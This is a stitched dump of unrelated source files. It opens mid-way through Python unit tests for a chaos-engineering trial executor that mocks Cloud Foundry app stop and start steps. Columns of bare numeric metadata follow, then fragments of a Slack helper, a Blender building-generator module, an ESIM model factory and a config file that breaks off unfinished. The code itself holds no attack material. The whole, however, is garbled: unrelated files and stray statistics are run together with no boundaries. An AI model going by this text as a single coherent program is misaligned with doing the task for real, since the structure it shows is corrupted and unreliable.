call().append('ERROR',
"Step failed. Type: FailedExpectation. "
"Error: Expectation failed"
"(Hello World == unexpected-app-name)")])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('ERROR',
'Trial Failed. Type: StepsExecutionError. '
'Error: [in: steps, reason: Expectation failed'
'(Hello World == unexpected-app-name)]')])
mock_rec_commit.assert_has_calls([
call(mock_trial_step_log),
call(mock_trial_log)])
self.assertEqual(trial.status, TrialStatus.FAILED.value)
class TestTrialRunScenarioPostStepsSucceeded(TestTrialExecutor):
def setUp(self):
super(TestTrialRunScenarioPostStepsSucceeded, self).setUp()
self.steps = [{'step': 'Stop App',
'do': 'cf.stop_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.post_steps = [{'step': 'Start App',
'do': 'cf.start_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.trial = create_experiment_and_trial(
{}, self.steps, post_steps=self.post_steps)
def test_post_steps_succeed(self):
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_STOP_APP) as stop_app_action, \
mock.patch(self.CF_START_APP) as start_app_action, \
TrialExecutor(self.trial, self.module_map, {})\
as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_log_record = mock.Mock()
mock_log_record.append = mock.Mock()
mock_step_rec_cls.return_value = mock_log_record
start_app_action.return_value = 'start_app'
stop_app_action.return_value = 'stop_app'
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('steps', 'Stop app',
{'cf_api_url': self.cf_api_url, 'app_name': self.app_name}),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
'Result: {}.'.format(stop_app_action.return_value)),
call().append('INFO', 'Completed.'),
call('post_steps', 'Start app',
{'cf_api_url': self.cf_api_url, 'app_name': 'hello-world'}),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
'Result: {}.'.format(start_app_action.return_value)),
call().append('INFO', 'Completed.')])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('INFO', 'Trial Completed.')])
mock_rec_commit.assert_has_calls([call(mock_trial_log)])
self.assertEqual(self.trial.status, TrialStatus.SUCCEEDED.value)
class TestTrialRunScenarioPostStepsFailed(TestTrialExecutor):
def setUp(self):
super(TestTrialRunScenarioPostStepsFailed, self).setUp()
self.steps = [{'step': 'Stop App',
'do': 'cf.stop_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.post_steps = [{'step': 'Start App',
'do': 'cf.start_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.trial = create_experiment_and_trial(
{}, self.steps, post_steps=self.post_steps)
def test_post_steps_fail(self):
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_STOP_APP), \
mock.patch(self.CF_START_APP) as start_app_action, \
TrialExecutor(self.trial, self.module_map, {}) \
as trial_executor:
start_app_action.side_effect = Exception("Api error message")
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
trial_executor.run()
mock_log_rec_cls.assert_called_with('result')
mock_trial_log.append.assert_called_with(
'ERROR', 'Trial Failed. Type: StepsExecutionError. '
'Error: [in: post_steps, reason: Api error message]')
mock_rec_commit.assert_has_calls([call(mock_trial_log)])
self.assertEqual(self.trial.status, TrialStatus.FAILED.value)
class TestTrialRunScenarioPreStepsSucceeded(TestTrialExecutor):
def setUp(self):
super(TestTrialRunScenarioPreStepsSucceeded, self).setUp()
self.pre_steps = [{'step': 'Stop App',
'do': 'cf.stop_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.steps = [{'step': 'Start App',
'do': 'cf.start_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.trial = create_experiment_and_trial(
{}, self.steps, pre_steps=self.pre_steps)
def test_pre_steps_and_steps_succeed(self):
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.STEP_REC) as mock_step_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_STOP_APP) as stop_app_action, \
mock.patch(self.CF_START_APP) as start_app_action, \
TrialExecutor(self.trial, self.module_map, {}) \
as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
mock_log_record = mock.Mock()
mock_log_record.append = mock.Mock()
mock_step_rec_cls.return_value = mock_log_record
start_app_action.return_value = 'start_app'
stop_app_action.return_value = 'stop_app'
trial_executor.run()
mock_step_rec_cls.assert_has_calls([
call('pre_steps', 'Stop app',
{'cf_api_url': self.cf_api_url, 'app_name': self.app_name}),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
'Result: {}.'.format(stop_app_action.return_value)),
call().append('INFO', 'Completed.'),
call('steps', 'Start app',
{'cf_api_url': self.cf_api_url, 'app_name': self.app_name}),
call().append('INFO', 'Starting command execution.'),
call().append('INFO',
'Result: {}.'.format(start_app_action.return_value)),
call().append('INFO', 'Completed.')])
mock_log_rec_cls.assert_has_calls([
call('result'),
call().append('INFO', 'Trial Completed.')])
mock_rec_commit.assert_has_calls([
call(mock_trial_log)])
self.assertEqual(self.trial.status, TrialStatus.SUCCEEDED.value)
class TestTrialRunScenarioPreStepsFailed(TestTrialExecutor):
def setUp(self):
super(TestTrialRunScenarioPreStepsFailed, self).setUp()
self.pre_steps = [{'step': 'Stop App',
'do': 'cf.stop_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.steps = [{'step': 'Start App',
'do': 'cf.start_app',
'where': {
'cf_api_url': self.cf_api_url,
'app_name': self.app_name}}]
self.trial = create_experiment_and_trial(
{}, self.steps, pre_steps=self.pre_steps)
def test_pre_steps_fail(self):
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_STOP_APP) as stop_app_action, \
mock.patch(self.CF_START_APP), \
TrialExecutor(self.trial, self.module_map, {}) \
as trial_executor:
stop_app_action.side_effect = Exception("Api error message")
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
trial_executor.run()
mock_log_rec_cls.assert_called_with('result')
mock_trial_log.append.assert_called_with(
'ERROR',
"Trial Aborted. Type: StepsExecutionError. "
"Error: [in: pre_steps, reason: Api error message]")
mock_rec_commit.assert_has_calls([call(mock_trial_log)])
self.assertEqual(self.trial.status, TrialStatus.ABORTED.value)
class TestTrialRunOnExit(TestTrialExecutor):
def setUp(self):
super(TestTrialRunOnExit, self).setUp()
self.observer_mock = mock.Mock(spec=Observer)
def test_notify_attached_observers_on_trial_success(self):
with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
TrialExecutor(self._trial, self.module_map, {}) as trial_executor:
trial_executor.attach(self.observer_mock)
trial_executor.run()
self.observer_mock.update.assert_called_once_with(trial=self._trial)
def test_notify_attached_observers_on_trial_fail(self):
with mock.patch(self.CF_GET_APP) as get_app_action, \
mock.patch(self.CF_GET_ORG), \
TrialExecutor(self._trial, self.module_map, {}) \
as trial_executor:
get_app_action.side_effect = Exception("Api error message")
trial_executor.attach(self.observer_mock)
trial_executor.run()
self.observer_mock.update.assert_called_once_with(trial=self._trial)
class TestTrialRunOnStopped(TestTrialExecutor):
def setUp(self):
super(TestTrialRunOnStopped, self).setUp()
self.updated_status = None
def test_stopped_status(self):
with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
mock.patch(self.COMMIT) as mock_rec_commit, \
mock.patch(self.CF_STOP_APP), \
mock.patch(self.CF_START_APP), \
TrialExecutor(self._trial, self.module_map, {}) \
as trial_executor:
mock_trial_log = mock.Mock()
mock_trial_log.append = mock.Mock()
mock_log_rec_cls.return_value = mock_trial_log
self._trial.update_status(TrialStatus.STOP_INITIATED)
def update_status_mock_func(arg):
self.updated_status = arg
update_status_mock = mock.Mock()
update_status_mock.side_effect = update_status_mock_func
self._trial.update_status = update_status_mock
trial_executor.run()
mock_log_rec_cls.assert_called_with('result')
mock_rec_commit.assert_has_calls([call(mock_trial_log)])
self.assertEqual(self.updated_status, TrialStatus.STOPPED)
def test_not_stopped_in_post_steps(self):
with mock.patch(self.LOG_REC), \
mock.patch(self.COMMIT), \
mock.patch(self.CF_STOP_APP), \
mock.patch(self.CF_START_APP), \
TrialExecutor(self._trial, self.module_map, {}) \
as trial_executor:
def update_status_if_start_app(arg1, arg2):
if arg1.get_function_name() == 'start_app':
self._trial.update_status(TrialStatus.STOP_INITIATED)
execute_action_mock = mock.Mock()
execute_action_mock.side_effect = update_status_if_start_app
trial_executor._execute_action = execute_action_mock
trial_executor.run()
self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)
class TestExecuteTrial(TestCase):
@mock.patch("kallisticore.lib.trial_executor.TrialExecutor", autospec=True)
def test_trial_executor_invoked(self, mock_trial_executor):
mock_object = self.create_mock_trial_executor(mock_trial_executor)
trial = {}
execute_trial(trial)
self.assert_executor_called(mock_object, mock_trial_executor, trial)
def assert_executor_called(self, mock_object, mock_trial_executor, trial):
module_map = getattr(settings, 'KALLISTI_MODULE_MAP', {})
cred_cls_map = getattr(settings, 'KALLISTI_CREDENTIAL_CLASS_MAP', {})
mock_trial_executor.assert_called_once_with(trial, module_map,
cred_cls_map)
mock_object.__enter__.assert_called_once()
mock_object.__enter__.assert_called_once()
mock_object.run.assert_called_once()
mock_object.__exit__.assert_called_once()
def create_mock_trial_executor(self, mock_trial_executor):
mock_object = Mock()
mock_object.__enter__ = Mock(return_value=mock_object)
mock_object.__exit__ = Mock()
mock_trial_executor.return_value = mock_object
return mock_object
| 45.662584
| 79
| 0.591928
| 4,810
| 41,005
| 4.670686
| 0.045738
| 0.041307
| 0.048607
| 0.027775
| 0.828852
| 0.786121
| 0.769518
| 0.750512
| 0.736135
| 0.729636
| 0
| 0.000139
| 0.298793
| 41,005
| 897
| 80
| 45.713489
| 0.781205
| 0
| 0
| 0.73125
| 0
| 0
| 0.12479
| 0.013828
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.05125
| false
| 0.0025
| 0.01625
| 0
| 0.095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7a55f0c3a06db6d43523d2d9069d00fa02402ad
| 210
|
py
|
Python
|
foxylib/tools/messenger/slack/methods/response_tool.py
|
foxytrixy-com/foxylib
|
94b8c5b9f8b12423393c68f7d9f910258840ed18
|
[
"BSD-3-Clause"
] | null | null | null |
foxylib/tools/messenger/slack/methods/response_tool.py
|
foxytrixy-com/foxylib
|
94b8c5b9f8b12423393c68f7d9f910258840ed18
|
[
"BSD-3-Clause"
] | 3
|
2019-12-12T05:17:44.000Z
|
2022-03-11T23:40:50.000Z
|
foxylib/tools/messenger/slack/methods/response_tool.py
|
foxytrixy-com/foxylib
|
94b8c5b9f8b12423393c68f7d9f910258840ed18
|
[
"BSD-3-Clause"
] | 2
|
2019-10-16T17:39:34.000Z
|
2020-02-10T06:32:08.000Z
|
class SlackResponseTool:
@classmethod
def response2is_ok(cls, response):
return response["ok"] is True
@classmethod
def response2j_resopnse(cls, response):
return response.data
| 23.333333
| 43
| 0.690476
| 22
| 210
| 6.5
| 0.636364
| 0.195804
| 0.237762
| 0.34965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012422
| 0.233333
| 210
| 8
| 44
| 26.25
| 0.875776
| 0
| 0
| 0.285714
| 0
| 0
| 0.009524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.285714
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ac02f6d2e73030d01549481649f9ef6c0c326870
| 100
|
py
|
Python
|
api/crud/__init__.py
|
p0lygun/astounding-arapaimas
|
f82dbb2ec75ab7d98da6a46a1276c12583048b3c
|
[
"MIT"
] | null | null | null |
api/crud/__init__.py
|
p0lygun/astounding-arapaimas
|
f82dbb2ec75ab7d98da6a46a1276c12583048b3c
|
[
"MIT"
] | 19
|
2021-07-11T10:02:08.000Z
|
2021-07-20T14:58:29.000Z
|
api/crud/__init__.py
|
p0lygun/astounding-arapaimas
|
f82dbb2ec75ab7d98da6a46a1276c12583048b3c
|
[
"MIT"
] | null | null | null |
from api.crud.crud_game import game # noqa: F401
from api.crud.crud_user import user # noqa: F401
| 33.333333
| 49
| 0.76
| 18
| 100
| 4.111111
| 0.444444
| 0.189189
| 0.297297
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.16
| 100
| 2
| 50
| 50
| 0.809524
| 0.21
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac30bc1e464669d5413efdbe71a1c6c4a78edb9c
| 14,676
|
py
|
Python
|
BlenderProject/ProceduralBuildingGenerator/generateModules.py
|
AlexMG99/ProceduralBuildingGeneratorTool
|
6cf8619449385d8d78561b66c93b43b5ee8a2443
|
[
"MIT"
] | 3
|
2021-06-21T17:02:51.000Z
|
2022-03-25T16:03:31.000Z
|
BlenderProject/ProceduralBuildingGenerator/generateModules.py
|
AlexMG99/ProceduralBuildingGeneratorTool
|
6cf8619449385d8d78561b66c93b43b5ee8a2443
|
[
"MIT"
] | null | null | null |
BlenderProject/ProceduralBuildingGenerator/generateModules.py
|
AlexMG99/ProceduralBuildingGeneratorTool
|
6cf8619449385d8d78561b66c93b43b5ee8a2443
|
[
"MIT"
] | null | null | null |
import bpy, bmesh
import random as rand
from . import utilities
from . import material
from . import generateAssets
# Generate module window
def generateModuleWindow(obj, windowSize, windowType):
bpy.data.objects[obj.name].select_set(True)
# Randomness
buildingParameters = bpy.context.scene.buildingParameters
windowSize[0] += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
windowSize[1] += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
# Go to edit mode, face selection modes
bpy.ops.object.mode_set( mode = 'EDIT' )
bpy.ops.mesh.select_mode( type = 'FACE' )
bpy.ops.mesh.select_all( action = 'SELECT' )
# Generate the window frame ----------------------------------------------------------------------------- #
# Cut window in two
bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
"smoothness":0,
"falloff":'INVERSE_SQUARE',
"object_index":0,
"edge_index":1,
"mesh_select_mode_init":(False, True, False)},
TRANSFORM_OT_edge_slide={"value":0})
# Apply bevel
bpy.ops.mesh.bevel(offset=windowSize[0], offset_pct=0, affect='EDGES')
# Cut in half the plane
bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
"smoothness":0,
"falloff":'INVERSE_SQUARE',
"object_index":0,
"edge_index":5,
"mesh_select_mode_init":(False, True, False)},
TRANSFORM_OT_edge_slide={"value":0})
# Apply bevel
bpy.ops.mesh.bevel(offset=windowSize[1], offset_pct=0, affect='EDGES')
# Deselect all and select middle face
bpy.ops.mesh.select_all( action = 'DESELECT' )
utilities.selectFaceByIndex(obj, 6)
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, 0, -0.25)})
# Generate UVS and add material to object
bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
idx = [1, 2, 8, 13]
material.generateUVS(obj, idx)
# Select wall texture or color
if(bpy.context.scene.textureParameters.wallTexture == True):
material.addMaterial(obj, bpy.context.scene.textureParameters.wallTextures)
else:
material.addMaterialBase(obj, "Wall 1")
# ------------------------------------------------------------------------------------------------------ #
# Generate Window
generateAssets.generateWindow(obj, windowSize[1], windowType)
# Rotate building 90 degrees to align it with the building
bpy.ops.object.mode_set( mode = 'OBJECT' )
bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Generate door module
def generateModuleDoor(obj, doorWidth, doorHeight):
bpy.data.objects[obj.name].select_set(True)
# Randomness
buildingParameters = bpy.context.scene.buildingParameters
doorWidth += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
doorHeight += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
# Go to edit mode, face selection modes
bpy.ops.object.mode_set( mode = 'EDIT' )
bpy.ops.mesh.select_mode( type = 'FACE' )
bpy.ops.mesh.select_all( action = 'SELECT' )
# Generate the window frame ----------------------------------------------------------------------------- #
# Cut window in two
bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
"smoothness":0,
"falloff":'INVERSE_SQUARE',
"object_index":0,
"edge_index":1,
"mesh_select_mode_init":(False, True, False)},
TRANSFORM_OT_edge_slide={"value":0})
# Apply bevel
bpy.ops.mesh.bevel(offset=doorWidth, offset_pct=0, affect='EDGES')
# Cut in half the plane
bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
"smoothness":0,
"falloff":'INVERSE_SQUARE',
"object_index":0,
"edge_index":1,
"mesh_select_mode_init":(False, True, False)},
TRANSFORM_OT_edge_slide={"value":doorHeight})
# Deselect all and select middle faces
bpy.ops.mesh.select_all( action = 'DESELECT' )
utilities.selectFaceByIndex(obj, 2)
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, 0, -0.25)})
# Generate UVS and add material to object
bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
idx = [1,8,9,15]
material.generateUVS(obj, idx)
# Select wall texture or color
if(bpy.context.scene.textureParameters.wallTexture == True):
material.addMaterial(obj, bpy.context.scene.textureParameters.wallTextures)
else:
material.addMaterialBase(obj, "Wall 1")
# ------------------------------------------------------------------------------------------------------ #
# Generate Window
generateAssets.generateDoor(obj)
# Rotate building 90 degrees to align it with the building
bpy.ops.object.mode_set( mode = 'OBJECT' )
bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Generate door module
def generateModuleBalcony(obj, balconyWidth, balconyHeight, balconyType):
bpy.data.objects[obj.name].select_set(True)
# Randomness
buildingParameters = bpy.context.scene.buildingParameters
balconyWidth += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
balconyHeight += rand.uniform(-0.1, 0.1) * buildingParameters.randomnessBuilding
# Go to edit mode, face selection modes
bpy.ops.object.mode_set( mode = 'EDIT' )
bpy.ops.mesh.select_mode( type = 'FACE' )
bpy.ops.mesh.select_all( action = 'SELECT' )
# Generate the window frame ----------------------------------------------------------------------------- #
# Cut window in two
bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
"smoothness":0,
"falloff":'INVERSE_SQUARE',
"object_index":0,
"edge_index":1,
"mesh_select_mode_init":(False, True, False)},
TRANSFORM_OT_edge_slide={"value":0})
# Apply bevel
bpy.ops.mesh.bevel(offset=balconyWidth, offset_pct=0, affect='EDGES')
# Cut in half the plane
bpy.ops.mesh.loopcut_slide(MESH_OT_loopcut={"number_cuts":1,
"smoothness":0,
"falloff":'INVERSE_SQUARE',
"object_index":0,
"edge_index":1,
"mesh_select_mode_init":(False, True, False)},
TRANSFORM_OT_edge_slide={"value":balconyHeight})
# Deselect all and select middle face
bpy.ops.mesh.select_all( action = 'DESELECT' )
utilities.selectFaceByIndex(obj, 2)
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, 0, -0.25)})
# Generate UVS and add material to object
bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
idx = [1,8,9,15]
material.generateUVS(obj, idx)
# Select wall texture or color
if(bpy.context.scene.textureParameters.wallTexture == True):
material.addMaterial(obj, bpy.context.scene.textureParameters.wallTextures)
else:
material.addMaterialBase(obj, "Wall 1")
# ------------------------------------------------------------------------------------------------------ #
# Generate Window
generateAssets.generateBalconyWindow(obj, balconyWidth)
# ------------------------------------------------------------------------------------------------------ #
# External balcony surface
bpy.ops.mesh.select_all(action = 'DESELECT') #Deselecting all
idx = [9, 12, 14]
utilities.selectEdgesByIndex(obj.name, idx)
# Create balcony floor
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, 0, balconyWidth * 0.75)})
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, 0, balconyWidth * 0.2)})
bpy.ops.mesh.select_more()
bpy.ops.mesh.select_more()
bpy.ops.uv.cube_project(cube_size=1)
bpy.ops.mesh.select_less()
# Create balcony front wall
bpy.ops.mesh.duplicate()
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, -balconyHeight, 0)})
bpy.ops.mesh.select_more()
bpy.ops.mesh.select_more()
bpy.ops.uv.cube_project(cube_size=1)
# Close Balcony
if balconyType == "Solo":
idx = [44, 45]
utilities.selectFacesByIndex(obj, idx)
elif balconyType == "Left":
bpy.ops.mesh.select_all(action = 'DESELECT')
utilities.selectFaceByIndex(obj, 44)
elif balconyType == "Right":
bpy.ops.mesh.select_all(action = 'DESELECT')
utilities.selectFaceByIndex(obj, 45)
if balconyType != "Middle":
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, -balconyHeight, 0)})
bpy.ops.mesh.select_more()
bpy.ops.uv.cube_project(cube_size=1)
# Rotate building 90 degrees to align it with the building
bpy.ops.object.mode_set( mode = 'OBJECT' )
bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Generate module wall
def generateModuleWall(obj):
bpy.data.objects[obj.name].select_set(True)
# Select wall texture or color
if(bpy.context.scene.textureParameters.wallTexture == True):
material.addMaterial(obj, bpy.context.scene.textureParameters.wallTextures)
else:
material.addMaterialBase(obj, "Wall 1")
# Rotate building 90 degrees to align it with the building
bpy.ops.object.mode_set( mode = 'OBJECT' )
bpy.ops.transform.rotate(value=-1.5708, orient_axis='X', orient_type='GLOBAL')
# Create simple door
def generateRoofModule(obj):
material.addMaterial(obj, "Roof")
# Inset window frame
bpy.ops.mesh.inset(thickness=0.05, depth=0)
bpy.ops.mesh.extrude_region_move(MESH_OT_extrude_region={"use_normal_flip":False,
"use_dissolve_ortho_edges":False,
"mirror":False},
TRANSFORM_OT_translate={"value":(0, 0, -0.2)})
idx = [0,1,2,3,16,17,18,19]
material.generateUVS(obj, idx)
| 46.443038
| 122
| 0.468793
| 1,305
| 14,676
| 5.100383
| 0.132567
| 0.049579
| 0.061599
| 0.050481
| 0.859075
| 0.852013
| 0.852013
| 0.852013
| 0.823918
| 0.823918
| 0
| 0.019857
| 0.399496
| 14,676
| 315
| 123
| 46.590476
| 0.735391
| 0.144181
| 0
| 0.743017
| 1
| 0
| 0.093855
| 0.025444
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027933
| false
| 0
| 0.027933
| 0
| 0.055866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ac392b03a2a77a7c7fce8dd713446c0a125c86bd
| 2,502
|
py
|
Python
|
src/athene/rte/utils/estimator_definitions.py
|
UKPLab/fever-2018-team-athene
|
730e4055899680c2ce5d5be1881e36913041d490
|
[
"Apache-2.0"
] | 41
|
2019-02-11T13:49:54.000Z
|
2022-01-25T19:37:29.000Z
|
src/athene/rte/utils/estimator_definitions.py
|
j6mes/fever-athene-system
|
e2b3cd731e5675c78745d918fd2d194cfd4191ca
|
[
"Apache-2.0"
] | 22
|
2019-02-20T13:42:28.000Z
|
2022-02-09T23:29:32.000Z
|
src/athene/rte/utils/estimator_definitions.py
|
j6mes/fever-athene-system
|
e2b3cd731e5675c78745d918fd2d194cfd4191ca
|
[
"Apache-2.0"
] | 13
|
2019-03-27T08:42:40.000Z
|
2022-03-27T14:14:30.000Z
|
import numpy as np
def get_estimator(scorer_type, save_folder=None):
if scorer_type == 'esim':
# submitted model, glove + fasttext, with attention
from os import path
from athene.rte.deep_models.ESIM_for_ensemble import ESIM
from athene.utils.config import Config
pos_weight = np.asarray(Config.esim_hyper_param['pos_weight'], np.float32)
clf = ESIM(random_state=Config.seed, tensorboard_logdir="logdir/", learning_rate=Config.esim_hyper_param['lr'],
max_check_without_progress=Config.esim_hyper_param['max_checks_no_progress'],
activation=Config.esim_hyper_param['activation'],
initializer=Config.esim_hyper_param['initializer'],
lstm_layers=Config.esim_hyper_param['lstm_layers'],
optimizer=Config.esim_hyper_param['optimizer'],
trainable=Config.esim_hyper_param['trainable'],
batch_size=Config.esim_hyper_param['batch_size'],
dropout_rate=Config.esim_hyper_param['dropout'],
num_neurons=Config.esim_hyper_param['num_neurons'], pos_weight=pos_weight,
ckpt_path=path.join(save_folder, Config.name + '.ckpt'), name=Config.name)
if scorer_type == 'esim_glove_no_attention':
# glove, no attention
from os import path
from athene.rte.deep_models.ESIM_for_ensemble_glove_only_no_attention import ESIM
from athene.utils.config import Config
pos_weight = np.asarray(Config.esim_hyper_param['pos_weight'], np.float32)
clf = ESIM(random_state=Config.seed, tensorboard_logdir="logdir/", learning_rate=Config.esim_hyper_param['lr'],
max_check_without_progress=Config.esim_hyper_param['max_checks_no_progress'],
activation=Config.esim_hyper_param['activation'],
initializer=Config.esim_hyper_param['initializer'],
lstm_layers=Config.esim_hyper_param['lstm_layers'],
optimizer=Config.esim_hyper_param['optimizer'],
trainable=Config.esim_hyper_param['trainable'],
batch_size=Config.esim_hyper_param['batch_size'],
dropout_rate=Config.esim_hyper_param['dropout'],
num_neurons=Config.esim_hyper_param['num_neurons'], pos_weight=pos_weight,
ckpt_path=path.join(save_folder, Config.name + '.ckpt'), name=Config.name)
return clf
| 61.02439
| 119
| 0.665468
| 300
| 2,502
| 5.196667
| 0.226667
| 0.141116
| 0.211674
| 0.282232
| 0.891597
| 0.891597
| 0.891597
| 0.891597
| 0.891597
| 0.891597
| 0
| 0.002094
| 0.236611
| 2,502
| 40
| 120
| 62.55
| 0.814136
| 0.027578
| 0
| 0.8
| 0
| 0
| 0.113169
| 0.027572
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.2
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce2e370e2cf31c2e56f9587afdcae0351931d174
| 41,027
|
py
|
Python
|
configs/vision/smpleff.py
|
GabrieleLagani/HebbianPCA
|
2736bb3017fa30ad2c160c891d42361bc5894df5
|
[
"MIT"
] | 4
|
2021-01-30T14:53:54.000Z
|
2021-03-23T09:52:18.000Z
|
configs/vision/smpleff.py
|
GabrieleLagani/HebbianPCA
|
2736bb3017fa30ad2c160c891d42361bc5894df5
|
[
"MIT"
] | null | null | null |
configs/vision/smpleff.py
|
GabrieleLagani/HebbianPCA
|
2736bb3017fa30ad2c160c891d42361bc5894df5
|
[
"MIT"
] | 2
|
2022-03-04T08:28:44.000Z
|
2022-03-16T19:00:34.000Z
|
import neurolab.params as P
import params as PP
from .meta import *
config_base_gdes = {}
gdes_fc_on_gdes_layer = {}
gdes_fc_on_gdes_layer_ft = {}
hebb_fc_on_gdes_layer = {}
hebb_fc_on_gdes_layer_ft = {}
prec_on_gdes_layer = {}
prec_on_gdes_layer_ft = {}
knn_on_gdes_layer = {}
knn_on_gdes_layer_ft = {}
svm_on_gdes_layer = {}
svm_on_gdes_layer_ft = {}
gdes_fc_on_hebb_layer = {}
gdes_fc_on_hebb_layer_ft = {}
hebb_fc_on_hebb_layer = {}
hebb_fc_on_hebb_layer_ft = {}
prec_on_hebb_layer_ft = {}
knn_on_hebb_layer = {}
knn_on_hebb_layer_ft = {}
svm_on_hebb_layer = {}
